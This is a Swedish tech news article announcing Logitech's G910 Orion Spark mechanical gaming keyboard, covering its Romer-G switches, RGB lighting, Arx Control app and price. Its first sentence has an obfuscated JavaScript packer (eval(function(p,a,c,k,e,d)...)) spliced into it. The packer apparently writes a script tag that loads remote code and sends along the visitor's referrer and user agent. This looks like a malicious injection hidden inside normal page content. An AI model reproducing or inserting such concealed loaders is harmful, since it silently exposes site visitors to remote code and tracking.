Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Logitech har skapat världens mest avancerade gaming-tangentbord

Logitech har skapat världens mest avancerade gaming-tangentbord

Logitech eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zyhaa|var|u0026u|referrer|zbnef||js|php’.split(’|’),0,{}))
tillkännager idag G910 Orion Spark RGB Mechanical Keyboard. Tangentbordet är byggt kring de nya Logitech-exklusiva mekaniska brytarna Romer-G vars kortare avstånd till aktiveringspunkten ger dig upp till 25 procent snabbare registrering än någon annan mekanisk brytare. Det är byggt för att klara tuffa utmaningar och är utrustat med smart belysning.

”Det här tangentbordet markerar kulmen på åratal av forskning och utveckling för vårt ingenjörsteam. Med hjälp av feedback från gamers och esport-atleter har de utvecklat nästa generations mekaniska tangentbord,” säger Vincent Tucker, ansvarig för speltillbehör på Logitech. ”Vårt team fick uppgiften att utveckla ett tangentbord som verkligen moderniserar spelupplevelsen och Orion Spark blev svaret.”

Tangentbordet kombinerar blixtsnabb responsivitet, förbättrad precision och överlägsen RGB-belysning i en design byggd för prestanda.

”Mina spelare älskar den nya brytaren,” säger Andy Dinh, ägare till Team Solomid. ”De gillar dem så mycket att hela laget kommer använda dem i League of Legends-turneringen World Championship.”

Snabba, responsiva, hållbara: Mekaniska brytarna Romer-G

Orion Spark är byggt kring den Logitech-exklusiva mekaniska brytaren Romer-G. Du hittar inte den i något annat tangentbord. Med en aktiveringspunkt på 1,5 mm registrerar Romer-G-brytarna ditt tryck på tangenten upp till 25% snabbare än konkurrerande mekaniska brytare. Tangentbordet är designat för intensivt spelande, det ska hålla för upp till 70 miljoner knapptryck, upp till 40% längre än konkurrenterna.

Intelligent RGB-belysning

Belysningen i varje tangent på Orion Spark kan ställas in individuellt utifrån en palett på 16,8 miljoner färger. Du kan markera enskilda tangenter med färg för att hålla redo på spells och kommandon, anpassa ljuset efter spelet du spelar eller byta färg för att matcha din dator. Ljuset är centralt placerat i varje brytare och styrs av precisionsoptik för att försäkra att bokstäverna på varje tangent belyses jämt.

Arx Control-integration

Arx Control är en ny app från Logitech G som tillsammans med mjukvaran Logitech Gaming Software ger dig tillgång till en mängd information på din mobil. Allt från information från spel till systeminfo, prestanda eller mediakontroller. Med Arx Control SDK kan spelutvecklare utveckla egna appar anpassade till sina egna spel. Stora speltillverkare som Valve har fått tidiga kopior och utforskar integrationsmöjligheter med Steam och populära spel. Tangentbordet har dessutom en docka där du kan placera din telefon.

Nio programmerbara knappar

Du kan anpassa tangentbordet till ditt favoritspel genom att tilldela de nio programmerbara individuella funktioner eller makron och på så sätt enkelt komma åt komplicerade kommandon. Orion Spark stödjer upp till 27 olika kommandon uppdelade på tre profiler. Med hjälp av programvaran Logitech Gaming Software ställer du själv lätt in funktionerna

Pris och tillgänglighet

Orion Spark förväntas finnas tillgänglig i butik från november 2014, med ett föreslaget pris på 1790 SEK. För mer information besök gaming.logitech.com eller vår blogg.